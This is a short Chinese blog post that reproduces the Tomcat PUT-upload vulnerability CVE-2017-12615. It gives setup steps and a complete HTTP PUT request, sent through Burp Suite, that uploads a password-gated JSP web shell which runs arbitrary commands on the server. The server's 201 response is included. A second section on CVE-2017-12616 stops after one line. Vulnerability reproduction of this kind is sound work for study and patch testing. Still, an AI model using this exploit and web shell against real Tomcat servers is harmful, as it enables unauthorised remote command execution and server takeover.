tomcat缺陷重现

Posted 2020-10-08 sunbylm

一、CVE-2017-12615

参照：http://blog.csdn.net/qq1124794084/article/details/78044756

复现方法：

1、下载tomcat 7.0.21

2、修改conf/web/xml文件添加readonly为false

  <init-param>
            <param-name>readonly</param-name>
            <param-value>false</param-value>
  </init-param>

3、启动tomcat

4、打开软件Burp Suite Free Edition v1.7.27

5、在Burp Suite Free软件的Repeater标签栏输入如下内容（备注：IP和端口为tomcat运行的服务器的IP以及端口）：

PUT /123.jsp/ HTTP/1.1 Host: 10.20.129.14:8080 User-Agent:  JNTASS DNT:1 Connection: close Content-Length: 660

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

6、单击Go

7、在弹出框中输入tomcat运行的服务器的IP以及tomcat的web端口

9、单击Go

10、Response如下：

HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Tue, 26 Sep 2017 07:07:31 GMT
Connection: close

11、查看tomcat安装目录的webapps/ROOT目录下能够看见123.jsp文件

 

 

 

 

二、CVE-2017-12616

server.xml文件VirtualDirContext